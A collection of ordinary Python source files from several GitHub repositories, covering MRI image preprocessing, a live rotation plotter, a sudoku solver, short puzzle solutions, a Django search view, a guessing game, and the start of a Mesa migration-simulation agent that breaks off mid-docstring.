https://simpleitk.readthedocs.io/en/v1.2.4/Examples/ImageGridManipulation/Documentation.html?highlight=crop#code\n    \"\"\"\n    def __init__(self,lower_bound=0):\n        super().__init__()\n        self.lower_bound = lower_bound\n    \n    def __call__(self,img_sitk):\n        tmp_arr = sitk.GetArrayFromImage( img_sitk ).transpose((2,1,0))\n        tmp_arr = tmp_arr[::3,::3,::2]\n        idx = np.where(tmp_arr>self.lower_bound)\n#         idx = cp.where(cp.array(tmp_arr)>self.lower_bound)\n        idx0_min = int(idx[0].min()*3)\n        idx0_max = int(idx[0].max()*3+1)\n        idx1_min = int(idx[1].min()*3)\n        idx1_max = int(idx[1].max()*3+1)\n        idx2_min = int(idx[2].min()*2)\n        idx2_max = int(idx[2].max()*2+1)\n        bbox = (idx0_min, idx0_max, idx1_min, idx1_max, idx2_min, idx2_max)\n        img_sitk = img_sitk[\n            bbox[0]:bbox[1],\n            bbox[2]:bbox[3],\n            bbox[4]:bbox[5]]\n        \n        return img_sitk,bbox\n\n\nclass SITKRandomCrop(object):\n    \"\"\"\n    Randomly crop a sub-volume of the image\n    reference: https://simpleitk.readthedocs.io/en/v1.2.4/Examples/ImageGridManipulation/Documentation.html?highlight=crop#code\n    \"\"\"\n    def __init__(self,size_lower=0.0,size_upper=1.0):\n        super().__init__()\n        self.size_lower = size_lower\n        self.size_upper = size_upper\n    \n    def __call__(self,img_sitk):\n        size = img_sitk.GetSize()\n        # minimum and maximum crop sizes\n        min_size, max_size = np.ceil(self.size_lower*np.array(size)), np.floor(self.size_upper*np.array(size))\n        # actual size to crop out\n        crop_size = 
[random.randint(a,b) for a,b in zip(min_size,max_size)]\n        # actual crop start position\n        start_loc = [random.randint(0,b-a) for a,b in zip(crop_size,size)]\n        # crop\n        img_sitk = img_sitk[\n            start_loc[0]:start_loc[0]+crop_size[0], \n            start_loc[1]:start_loc[1]+crop_size[1], \n            start_loc[2]:start_loc[2]+crop_size[2]]\n\n        return img_sitk\n\n\nclass SITKAdaptiveHistEqual(object):\n    \"\"\"\n    Adaptive histogram equalization.\n    reference: https://blog.csdn.net/qq_39071739/article/details/107492462\n    \"\"\"\n    def __init__(self,alpha=0.9,beta=0.9,radius=3):\n        super().__init__()\n        self.alpha = alpha\n        self.beta = beta\n        self.radius = radius\n    \n    def __call__(self,img_sitk):\n        # 4.Histogram equalization\n        sitk_hisequal = sitk.AdaptiveHistogramEqualizationImageFilter()\n        sitk_hisequal.SetAlpha(self.alpha)\n        sitk_hisequal.SetBeta(self.beta)\n        sitk_hisequal.SetRadius(self.radius)\n        sitk_hisequal = sitk_hisequal.Execute(img_sitk)\n        return sitk_hisequal\n\n\n# +\nif __name__ == \"__main__\":\n    \"\"\"\n    # old version of the datasets\n    # ZSSY dataset\n    params = {\n        'pat_img': '/raid/huaqing/tyler/WRZ/data/internal_center_data/ZSSY_before_ROI/*/*SWS.nii.gz',\n        'pat_mask': '/raid/huaqing/tyler/WRZ/data/internal_center_data/ZSSY_before_ROI/*/*SWS_ROI.nii.gz',\n        'save_dir': '/raid/huaqing/tyler/WRZ/data/internal_center_data/ZSSY_before_ROI_processed',\n        'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n        #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n    }\n    # MMSY dataset\n    params = {\n        'pat_img': '/raid/huaqing/tyler/WRZ/data/external_center_data/MMSY_before_ROI/*/*SWS.nii.gz',\n        'pat_mask': '/raid/huaqing/tyler/WRZ/data/external_center_data/MMSY_before_ROI/*/*SWS_ROI.nii.gz',\n        'save_dir': '/raid/huaqing/tyler/WRZ/data/external_center_data/MMSY_before_ROI_processed',\n        'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n        #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n    }\n\n    # SDFY dataset\n    params = {\n        'pat_img': '/raid/huaqing/tyler/MedAI/WRZ/data/external_center_data/SDFY_before_ROI/*/*SWS.nii.gz',\n        'pat_mask': '/raid/huaqing/tyler/MedAI/WRZ/data/external_center_data/SDFY_before_ROI/*/*SWS_ROI.nii.gz',\n        'save_dir': '/raid/huaqing/tyler/MedAI/WRZ/data/external_center_data/SDFY_before_ROI_processed',\n        'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n        #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n    }\n    \"\"\"\n    \n#     # new version of the datasets\n#     # ZSSY dataset\n#     params = {\n#         'pat_img': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/ZSSY/*/*SWS.nii.gz',\n#         'pat_mask': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/ZSSY/*/*SWS_ROI.nii.gz',\n#         'save_dir': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/ZSSY_processed',\n#         'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n#         #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n#     }\n    \n#     # MMSY dataset\n#     params = {\n#         'pat_img': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/MMSY/*/*SWS.nii.gz',\n#         'pat_mask': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/MMSY/*/*SWS_ROI.nii.gz',\n#         'save_dir': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/MMSY_processed',\n#         'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n#         #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n#     }\n    \n    # SDFY dataset\n    params = {\n        'pat_img': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/SDFY/*/*SWS.nii.gz',\n        'pat_mask': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/SDFY/*/*SWS_ROI.nii.gz',\n        'save_dir': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/SDFY_processed',\n        'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n        #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n    
}\n\n    \n    \n    filepath_list_img = glob(params['pat_img'])\n    filepath_list_mask = [filepath.replace('SWS.nii.gz','SWS_ROI.nii.gz') for filepath in filepath_list_img]\n    \n    preprocessor = WRZ_MaskRCNN_Dataset_Processor(lower_bound=5)\n\n    for filepath_img,filepath_mask in tqdm(zip(filepath_list_img,filepath_list_mask)):\n        img_sitk, mask_sitk = preprocessor(filepath_img,filepath_mask)\n        # save the processed image\n        save_path = os.path.join(params['save_dir'],filepath_img.split(os.path.sep)[-2])\n        if not os.path.exists(save_path):\n            os.makedirs(save_path)\n        save_filepath_img = os.path.join(save_path,filepath_img.split(os.path.sep)[-1])\n        sitk.WriteImage( img_sitk,save_filepath_img )\n        # save the processed mask\n        save_filepath_mask = os.path.join(save_path,filepath_mask.split(os.path.sep)[-1])\n        sitk.WriteImage( mask_sitk,save_filepath_mask )\n# -\n\n\n","repo_name":"Huatsing-Lau/CSVD-CMBs-Detection-and-Classification","sub_path":"datasets/.ipynb_checkpoints/WRZ_DataSet_Process-checkpoint.py","file_name":"WRZ_DataSet_Process-checkpoint.py","file_ext":"py","file_size_in_byte":12463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"677889269","text":"import sys\nimport getopt\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\nstyle.use('seaborn')\n\nprev_file_mod_time = 0\nfile_time_counter = 0\n\n\ndef main(argv):\n    avg_rot = False\n    rot = False\n    x = False\n    y = False\n    z = False\n    window_seconds = 5\n\n    colors = ['red', 'blue', 'green', 'orange', 'black', 'purple', 'cyan', 'grey', 'violet', 'gold',\n              'indigo', 'brown', 'pink', 'magenta', 'tan', 'darkgreen', 'turquoise',\n              'darkblue', 'beige', 'olive', 'hotpink', 'darkred', 'darkgrey', 'crimson',\n              'coral', 'lavender', 'salmon', 'eggplant']\n\n    try:\n        opts, args = getopt.getopt(argv, \"harxyzw:\", [\"avg\", \"rot\", \"X\", \"Y\", \"Z\", \"window_size\"])\n    except getopt.GetoptError:\n        print(\"rotation_plot.py -a -x -y -z -w [--avg --X --Y --Z --window_size]\")\n        sys.exit(2)\n\n    for opt, arg in opts:\n        if opt == '-h':\n            print(\"rotation_plot.py -a -x -y -z -w [--avg --X --Y --Z --window_size]\")\n            sys.exit()\n        elif opt in (\"-a\", \"--avg\"):\n            avg_rot = True\n        elif opt in (\"-r\", \"--rot\"):\n            rot = True\n        elif opt in (\"-x\", \"--X\"):\n            x = True\n        elif opt in (\"-y\", \"--Y\"):\n            y = True\n        elif opt in (\"-z\", \"--Z\"):\n            z = True\n        elif opt in (\"-w\", \"--window_size\"):\n            window_seconds = int(arg)\n\n    if not (x or y or z):\n        print(\"Error: Specify at least one rotation axis (x/y/z) to plot.\\n\"\n              \"Use flags [-x | --X] and/or [-y | --Y] and/or [-z | --Z]\")\n        sys.exit()\n\n    file_names = list()\n    window_size = list()\n    time_step = list()\n\n    if not (rot or avg_rot):\n        print(\"Error: Specify at least one rotation stat. 
to plot.\\n\"\n \"Use flags [-r | --rot] and/or [-a | --avg_rot]\")\n sys.exit()\n\n if rot:\n file_names.append('/home/nash/DeepMimic/output/part_rot.dat')\n window_size.append(30 * 20 * window_seconds)\n time_step.append(0.033332/20)\n\n if avg_rot:\n file_names.append('/home/nash/DeepMimic/output/avg_part_rot.dat')\n window_size.append(30 * window_seconds)\n time_step.append(0.033332)\n\n graph_data = open(file_names[0], 'r').read()\n lns = graph_data.split('\\n')\n data_dim = len(lns[1].split(' '))\n\n num_plots = int(data_dim/3)\n\n fig, axs = plt.subplots(num_plots, sharey=True, sharex=True)\n fig.suptitle('Part Rotation Plot', fontsize=20)\n\n def plot_axs(sub_plot):\n return axs[sub_plot] if num_plots > 1 else axs\n\n def extract_plot_data(file, win_size, ts, check_file_update=False):\n global prev_file_mod_time\n global file_time_counter\n\n if check_file_update:\n file_mod_time = os.stat(file)[8]\n if file_mod_time == prev_file_mod_time:\n file_time_counter += 1\n else:\n file_time_counter = 0\n prev_file_mod_time = file_mod_time\n\n if file_time_counter > 10:\n return [], []\n\n graph_data = open(file, 'r').read()\n lines = graph_data.split('\\n')\n t = list()\n\n plot_data = np.empty((num_plots, win_size, 3))\n for i, line in enumerate(lines[-win_size:]):\n if len(line) > 1 and not line[0] == '#':\n data_point = line.split(' ')\n plot_data[:, i, :] = np.array([float(dp) for dp in data_point]).reshape(-1, 3)\n t.append(float(i) * ts)\n\n return plot_data, t\n\n def animate(i):\n plot_data = list()\n time_data = list()\n for i, (fn, ws, ts) in enumerate(zip(file_names, window_size, time_step)):\n data, time = extract_plot_data(fn, ws, ts, check_file_update=(i == 0))\n if len(data) > 0:\n plot_data.append(data)\n time_data.append(time)\n else:\n return\n\n if num_plots > 1:\n for ax in axs:\n ax.clear()\n else:\n axs.clear()\n\n for n, (data, t, ws) in enumerate(zip(plot_data, time_data, window_size)):\n for i in range(num_plots):\n ind = (n * num_plots) + i\n if x:\n plot_axs(i).plot(t[-ws:], data[i, :len(t), 0].tolist(), color=colors[ind],\n label=(('Joint-' + str(i+1)) if n == 0 else None))\n if y:\n plot_axs(i).plot(t[-ws:], data[i, :len(t), 1].tolist(), color=colors[ind],\n label=(('Joint-' + str(i+1)) if n == 0 else None))\n if z:\n plot_axs(i).plot(t[-ws:], data[i, :len(t), 2].tolist(), color=colors[ind],\n label=(('Joint-' + str(i+1)) if n == 0 else None))\n\n if i == np.ceil(num_plots/2):\n plot_axs(i).set(ylabel='Rotation (rad.)')\n\n plot_axs(i).legend(loc='upper right')\n plot_axs(num_plots-1).set(xlabel='Time(s)')\n\n _ = animation.FuncAnimation(fig, animate, interval=100)\n plt.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"nash911/Learning_Analyser","sub_path":"rotation_plot.py","file_name":"rotation_plot.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36106192644","text":"rows = 'ABCDEFGHI'\ncols = '123456789'\n\ndef cross(a, b):\n return [s+t for s in a for t in b]\n\nboxes = cross(rows, cols)\n\nrow_units = [cross(r, cols) for r in rows]\ncolumn_units = [cross(rows, c) for c in cols]\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\nunitlist = row_units + column_units + square_units\nunits = dict((s, [u for u in unitlist if s in u]) for s in boxes)\npeers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)\n\n\ndef display(values):\n \"\"\"\n Display the values as a 2-D grid.\n 
Input: The sudoku in dictionary form\n    Output: None\n    \"\"\"\n    width = 1+max(len(values[s]) for s in boxes)\n    line = '+'.join(['-'*(width*3)]*3)\n    for r in rows:\n        print(''.join(values[r+c].center(width)+('|' if c in '36' else '')\n                      for c in cols))\n        if r in 'CF': print(line)\n    return\n\ndef grid_values(grid):\n    \"\"\"\n    Combine boxes and grid into a dict with label and value pairs\n    Replace empty values with all possible values\n    \"\"\"\n    values = []\n    all_digits = '123456789'\n    for c in grid:\n        if c == '.':\n            values.append(all_digits)\n        elif c in all_digits:\n            values.append(c)\n    assert len(values) == 81\n    return dict(zip(boxes, values))\n\ndef eliminate(values):\n    \"\"\"\n    Eliminate values from peers of each box with a single value.\n    Returns Sudoku in dictionary form after eliminating values.\n    \"\"\"\n    solved_values = [box for box in values.keys() if len(values[box]) == 1]\n    for box in solved_values:\n        digit = values[box]\n        for peer in peers[box]:\n            values[peer] = values[peer].replace(digit, '')\n    return values\n\ndef only_choice(values):\n    \"\"\"\n    Go through all the units, and whenever there is a unit with a value\n    that only fits in one box, assign the value to this box.\n    \"\"\"\n    for unit in unitlist:\n        for d in '123456789':\n            dplaces = [box for box in unit if d in values[box]]\n            if len(dplaces) == 1:\n                values[dplaces[0]] = d\n    return values\n\ndef reduce_puzzle(values):\n    stalled = False\n    while not stalled:\n        # Check how many boxes have a determined value\n        solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])\n\n        # Apply Eliminate Strategy\n        values = eliminate(values)\n        # Apply Only Choice Strategy\n        values = only_choice(values)\n\n        # Check how many boxes have a determined value, to compare\n        solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])\n        # If no new values were added, stop the loop.\n        stalled = solved_values_before == solved_values_after\n        # Sanity check, return False if there is a box with zero available values:\n        if len([box for box in values.keys() if len(values[box]) == 0]):\n            return False\n    return values\n\ndef search(values):\n    \"Using depth-first search and propagation, create a search tree and solve the sudoku.\"\n    # First, reduce the puzzle until it stalls\n    values = reduce_puzzle(values)\n    if values is False:\n        return False\n    if all(len(values[s]) == 1 for s in boxes):\n        return values # SOLVED!!\n    # Choose one of the unfilled squares with the fewest possibilities\n    n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\n    # Use recursion to solve each one of the resulting sudokus, and if one returns a value (not False), return that answer!\n    for value in values[s]:\n        new_values = values.copy()\n        new_values[s] = value\n        attempt = search(new_values)\n        if attempt:\n            return attempt\n","repo_name":"danielpowell4/sudoku-solver","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27612851202","text":"# https://open.kattis.com/contests/knzvpe\n# Time: 2022-09-21 12:51:19\n# title: EtCPC2022 - Practice - 10 / Divisor Shuffle\n# language: Python 3\n\n\nn = int(input())\na = [int(i) for i in input().split()]\na.sort(reverse=True)\nx = a[0]\nfor i in range(n-1):\n    if x%a[i] != 0:\n        y = a[i]\n        break\n    else:\n        if a[i] == a[i+1]:\n            y = a[i]\n            break\nprint(y, x)\n 
","repo_name":"mukerem/competitive-programming","sub_path":"kattis/divisorshuffle.py","file_name":"divisorshuffle.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27444104902","text":"from django.shortcuts import render\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom comics.models import Comic\n\n\ndef do_search(request):\n \"\"\"\n A view to search for comics. For results\n paginate for more than 4 items per page.\n Search by name, grade and brand - publisher\n on customer facing side\n \"\"\"\n comics_list = Comic.objects.all()\n query = request.GET.get('q')\n if query:\n comics_list = Comic.objects.filter(\n Q(name__icontains=query) | Q(grade__icontains=query) |\n Q(brand__icontains=query)\n ).distinct()\n paginator = Paginator(comics_list, 4)\n\n page = request.GET.get('page')\n try:\n comics = paginator.page(page)\n except PageNotAnInteger:\n\n comics = paginator.page(1)\n except EmptyPage:\n\n comics = paginator.page(paginator.num_pages)\n return render(request, \"search.html\", {\"comics\": comics})\n","repo_name":"adonegan/milestone4-mycomicjumble","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28251411647","text":"from collections import defaultdict\nimport string\nimport re\n\ninput = open('input.txt').readlines()\ninput_list = []\nfor line in input:\n a, b = re.findall(r' ([A-Z]) ', line)\n input_list.append((a, b))\n\n\ndef part_1(rules):\n tasks, deps = get_tasks_and_deps(rules)\n done = []\n for _ in tasks:\n done.append(\n min(x for x in tasks if x not in done and deps[x] <= set(done)))\n return ''.join(done)\n\n\ndef part_2(rules):\n tasks, deps = get_tasks_and_deps(rules)\n done = set()\n seconds = 0\n counts = [0] * 5\n work = [''] * 5\n while True:\n for i, count in enumerate(counts):\n if count == 1:\n done.add(work[i])\n counts[i] = max(0, count - 1)\n while 0 in counts:\n i = counts.index(0)\n candidates = [x for x in tasks if deps[x] <= done]\n if not candidates:\n break\n task = min(candidates)\n tasks.remove(task)\n counts[i] = ord(task) - ord('A') + 61\n work[i] = task\n if sum(counts) == 0:\n break\n seconds += 1\n return seconds\n\n\ndef get_tasks_and_deps(rules):\n tasks = set()\n deps = defaultdict(set)\n for rule in rules:\n a, b = rule\n tasks |= {a, b}\n deps[b].add(a)\n return tasks, deps\n\n\nprint(part_1(input_list))\nprint(part_2(input_list))\n","repo_name":"jcockbain/advent-of-code-17-19","sub_path":"2018/7/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26062125557","text":"#This is a guess the number game.\n\nimport random\n\nguessesTaken = 0\n\nprint('This is a number guessing game. 
What is your name?')\nmyName = input()\n\nnumber = random.randint(1,50)\nprint('Welcome, ' + myName +', a random number has been selected between 1 and 50.')\n\nwhile guessesTaken < 4:\n    print('Take a guess.')\n    guess = input()\n    guess = int(guess)\n    \n    guessesTaken = guessesTaken + 1\n    \n    if guess < number:\n        print('Your guess is too low, ' + myName +', please try again.')\n    \n    if guess > number:\n        print('No, ' + myName +', you are guessing too high.')\n    \n    if guess == number:\n        break\n    \nif guess == number:\n    guessesTaken = str(guessesTaken)\n    print('Good job! You guessed the number in ' + guessesTaken + ' guesses')\n    \nif guess != number:\n    number = str(number)\n    print('Close but no cigar, I was thinking of ' + number) \n    ","repo_name":"lucas-sqz-binswanger/Number_Guessing_Game","sub_path":"numberguessingame.py","file_name":"numberguessingame.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"4588242916","text":"\"\"\"\nA custom Agent class for a Mesa simulation.\n\"\"\"\n\nfrom mesa import Agent, Model\nfrom .make_python_identifier import make_python_identifier as mpi\nfrom collections import namedtuple\nfrom collections.abc import Iterable\nfrom dataclasses import dataclass, field\nfrom typing import Any, List, Dict, Callable\nimport copy\nimport dill\nimport json\n# ---- CUSTOM IMPORTS ----\n# (many may be extraneous)\nimport random\nimport statistics\n\nrule_file = 'MigrationRules.json' # This could probably be done better?\n\n# GroupQry = namedtuple('GroupQry', 'attr rel cond full', defaults=[{}, {}, [], False])\n\n\n@dataclass\nclass GroupQry:\n    attr: Dict[str, Any] = field(default_factory=dict)\n    # check type of values here\n    rel: Dict[str, str] = field(default_factory=dict)\n    cond: List[Callable[[Agent], bool]] = field(default_factory=list)\n    full: bool = False\n\n    def __post_init__(self):\n        # ensure attributes and relations are valid variable names\n        self.attr = {mpi(k): v for k, v in self.attr.items()}\n        self.rel = {mpi(k): v for k, v in self.rel.items()}\n\n\nclass MigrationAgent(Agent):\n\n    _protected = ('model', 'random', 'source_name', 'unique_id', '_attr', '_rel', 'pos', 'set_dict', 'del_set',\n                  'ConflictRule', 'MigrationRule')  # TODO: should pos actually be in here\n\n    # def __init__(self, unique_id, model):\n    def __init__(self, unique_id, model, attr, rel):\n        # Mesa generally holds Agent data (including locations) as attributes, not dictionary entries.\n        # as such, we only store names of attributes and relations in different sets for compatibility with some\n        # specific PRAM functions like get_attrs and get_rels. 
If needed, attribute values are retrieved lazily\n        self._attr = set()\n        self._rel = set()\n        self.set_dict = {}\n        self.del_set = set()\n        super().__init__(unique_id, model)\n        # making identifiers should be handled in translation now\n        # self.namespace = {}  # for make_python_identifier\n        for key, value in attr.items():\n            # id, self.namespace = mpi(key, namespace=self.namespace, reserved_words=[])\n            # setattr(self, id, value)\n            # self._attr.add(id)\n            setattr(self, key, value)\n            # self._attr.add(key)\n        for key, value in rel.items():\n            s = self.model.site_hashes[value]\n            if key == '@':\n                self.model.grid.place_agent(self, s)\n                self._rel.add('pos')\n            else:\n                setattr(self, key, s)\n            # else:\n            #     # id, self.namespace = mpi(key, namespace=self.namespace, reserved_words=['agent', 'weight'])\n            #     # setattr(self, id, s)\n            #     # self._rel.add(id)\n            #     setattr(self, key, s)\n            #     self._rel.add(key)\n        # make (callable) instances of each of our rules\n        self.ConflictRule = ConflictRule(self)\n        self.MigrationRule = MigrationRule(self)\n\n    # we customize __setattr__ in order to:\n    # - keep track of attributes vs relations, mostly for pram compatibility.\n    # - prevent some awkward constructs when trying to set position (i.e., `if xyz == '@'...`)\n    # - transparently use make_python_identifier to ensure safe variable names\n    def __setattr__(self, name, value):\n        # don't treat special variables any different\n        if name in MigrationAgent._protected:\n            object.__setattr__(self, name, value)\n            return\n\n        name = mpi(name)\n\n        if value in self.model.grid.G.nodes:\n        # if value in self.model.site_hashes | self.model.grid.G.nodes:\n            # try:\n            #     value = self.model.site_hashes[value]\n            # except KeyError:\n            #     pass\n            if name == '_at_sign':\n                self.model.grid.move_agent(self, value)\n                # self._rel.add('pos')\n            else:\n                object.__setattr__(self, name, value)\n                self._rel.add(name)\n            return\n\n        object.__setattr__(self, name, value)\n        self._attr.add(name)\n\n    # we also customize __getattr__ to use make_python_identifier where needed and for position lookups\n    # we do not use __getattribute__; we only want to change behavior for non-safe/non-found attributes, and '@' (pos)\n    def __getattr__(self, name):\n        mod_name = mpi(name)\n        # if name == mod_name:\n        #     raise AttributeError(f\"'{type(self).__name__}' object has no attribute '{mod_name}'\")\n        if mod_name == '_at_sign':\n            return self.pos\n\n        # all we do to fix broken lookups is look for positional calls and unsafe names.\n        # if calling mpi fixes a name, this sends it back to __getattribute__ and we continue as normal.\n        # if not, it will get caught by the first if clause above (this may be an inefficient way to do this)\n        # return getattr(self, mod_name)\n        return object.__getattribute__(self, mod_name)\n\n    # we similarly customize __delattr__ to use make_python_identifier and to remove agents from the grid\n    def __delattr__(self, name):\n        try:\n            object.__delattr__(self, name)\n        except AttributeError:\n            name = mpi(name)\n            if name == '_at_sign':  # mpi('@') yields '_at_sign', matching __setattr__/__getattr__\n                self.model.grid._remove_agent(self, self.pos)  # the grid lives on the model\n                object.__delattr__(self, 'pos')\n            else:\n                object.__delattr__(self, name)\n\n        # purge from _attr or _rel (we just blindly guess until we either get it or don't)\n        try:\n            self._attr.remove(name)\n        except KeyError:\n            try:\n                self._rel.remove(name)\n            except KeyError:\n                pass\n\n    # models use SimultaneousActivation.\n    # The step function calls all of the rules, which will stage attribute changes.\n    # The advance function makes those changes.\n    def step(self):\n        self.ConflictRule()\n        self.MigrationRule()\n\n    def 
advance(self):\n for key, value in self.set_dict.items():\n setattr(self, key, value)\n self.set_dict.clear()\n\n while self.del_set:\n delattr(self, self.del_set.pop())\n\n def set(self, key, value):\n \"\"\"\n Use this function instead of directly setting an attribute in a rule.\n \"\"\"\n self.set_dict[key] = value\n\n def get(self, key, default=None):\n \"\"\"\n Alias for getattr(self, key, default).\n (Note however that this will return None instead of throw an AttributeError)\n \"\"\"\n return getattr(self, key, default)\n\n def delete(self, key):\n \"\"\"\n Use this function instead of directly deleting an attribute in a rule.\n \"\"\"\n self.del_set.add(key)\n\n def has_attr(self, qry):\n \"\"\"\n Determines if this agent matches a specified query of attributes.\n :param qry: A string, iterable, or mapping of attributes.\n :return: True if... (False otherwise)\n * qry is a string and is a key in this agent's __dict__\n * qry is an iterable and all items in it are keys in this agent's __dict__\n * qry is a mapping and all items in it are in this agent's __dict__\n Note: these checks are done after making the string, iterable items, or keys into python-safe names.\n \"\"\"\n if isinstance(qry, dict):\n qry = {mpi(key): value for key, value in qry.items()}\n return qry.items() <= self.__dict__.items()\n elif isinstance(qry, str): # place above iterable check, since str is iterable\n return mpi(qry) in self.__dict__.keys()\n elif isinstance(qry, Iterable):\n return all(mpi(i) in self.__dict__.keys() for i in qry)\n\n raise TypeError(\n f'qry passed to has_attr should be of type dict, str, or Iterable, but was {type(qry)} instead')\n\n def matches_qry(self, qry):\n \"\"\"\n Determines if this agent matches the given GroupQry.\n If qry.full is True the attributes and relations must be an exact match (not including unique identifiers like\n unique_id and source_name); if False, the qry's attributes and relations need only be a subset of the agent's.\n An agent automatically matches a None qry\n :param qry: A GroupQry namedtuple\n :return: True if the agent matches the qry; False otherwise\n \"\"\"\n\n if not qry:\n return True\n # the code below is REALLY PAINFUL... replacing it with 'return True` makes the code run like 20x faster\n if qry.rel.get('@'):\n qry.rel['pos'] = qry.rel.pop('@')\n\n if qry.full:\n return qry.attr.items() == {k: self.get(k) for k in self._attr}.items() \\\n and qry.rel.items() == {k: self.get(k) for k in self._rel}.items() \\\n and all([fn(self) for fn in qry.cond])\n else:\n return qry.attr.items() <= {k: self.get(k) for k in self._attr}.items() \\\n and qry.rel.items() <= {k: self.get(k) for k in self._rel}.items() \\\n and all([fn(self) for fn in qry.cond])\n\n\nclass ConflictRule:\n \"\"\"\n Conflict causes death and migration. The probability of death scales with the conflict's severity and scale\n while the probability of migration scales with the conflict's scale only. Multipliers for both factors are exposed\n as parameters.\n\n Time of exposure to conflict also increases the probability of death and migration, but that influence isn't\n modeled directly. 
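    (Illustrative sketch, not from the original docstring: applying a fixed
    per-step probability is the usual geometric shortcut for exposure time --

        p_death = scale * severity * severity_death_mult   # per simulation step
        p_unaffected_after_t_steps = (1 - p_death) ** t

    where the multipliers come from the rule's JSON config, as in apply() below.)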
Instead, a proportion of every group of non-migrating agents can die or migrate at every step of\n    the simulation.\n\n    Every time a proportion of the population begins to migrate, the destination site is set, and the distance to that\n    site is used elsewhere to control settlement.\n    \"\"\"\n\n    def __init__(self, agent):\n        self.agent = agent\n        self.model = agent.model\n        with open(rule_file, 'r') as file:\n            j = json.load(file)\n            data = next((d for d in j if d['rule_type'] == type(self).__name__), {})\n            if data:\n                gq = data['group_qry']\n                if gq:\n                    data['group_qry'] = GroupQry(gq['attr'], gq['rel'],\n                        dill.loads(bytes.fromhex(gq['cond'])), gq['full'])\n                self.__dict__.update(data)\n\n    def apply(self, pop, group, iter, t):\n        p_death = self.scale * self.severity * self.severity_death_mult\n        p_migration = self.scale * self.scale_migration_mult\n        # the definition of sites_dst is unfortunately missed in translation\n        # site_dst = random.choice(sites_dst)\n        site_dst = random.choice([s for s in pop.grid.G.nodes if s != 'Sudan'])\n        _x = pop.random.random()\n        if _x < p_death:\n            group.set('__void__', True)\n            return\n        if _x < p_death + p_migration:\n            group.set('is-migrating', True)\n            group.set('migration-time', 0)\n            group.set('travel-time-left', pop.get_attr(site_dst, 'travel-time'))\n            group.set('site-dst', site_dst)\n            return\n        else:\n            return\n\n    def __call__(self):\n        if not self.agent.matches_qry(self.group_qry):\n            return\n        if not self.i:\n            self.apply(self.model, self.agent, self.model.time, self.model.time)\n        elif isinstance(self.i, int) and self.model.time == self.i:\n            self.apply(self.model, self.agent, self.model.time, self.model.time)\n        elif isinstance(self.i, list):\n            if self.i[1] == 0 and self.model.time <= self.i[0]:\n                self.apply(self.model, self.agent, self.model.time, self.model.time)\n            elif self.i[0] <= self.model.time <= self.i[1]:\n                self.apply(self.model, self.agent, self.model.time, self.model.time)\n        elif isinstance(self.i, set) and self.model.time in self.i:\n            self.apply(self.model, self.agent, self.model.time, self.model.time)\n\n\nclass MigrationRule:\n    \"\"\"\n    A migrating population has a chance of dying, and the probability of that happening is proportional to the\n    harshness of the environment and the mass of the already-migrating population. Multipliers for both factors are\n    exposed as parameters.\n\n    Time of exposure to the environment also increases the probability of death, but that influence isn't modeled\n    directly. 
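    (Illustrative sketch, not from the original docstring: the per-step death
    probability in apply_keep_migrating() below combines both factors and is
    capped at certainty --

        p_death = min(env_harshness * env_harshness_death_mult
                      + migrating_p * migration_death_mult, 1.0)

    with migrating_p the share, in percent, of mass already on the move.)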
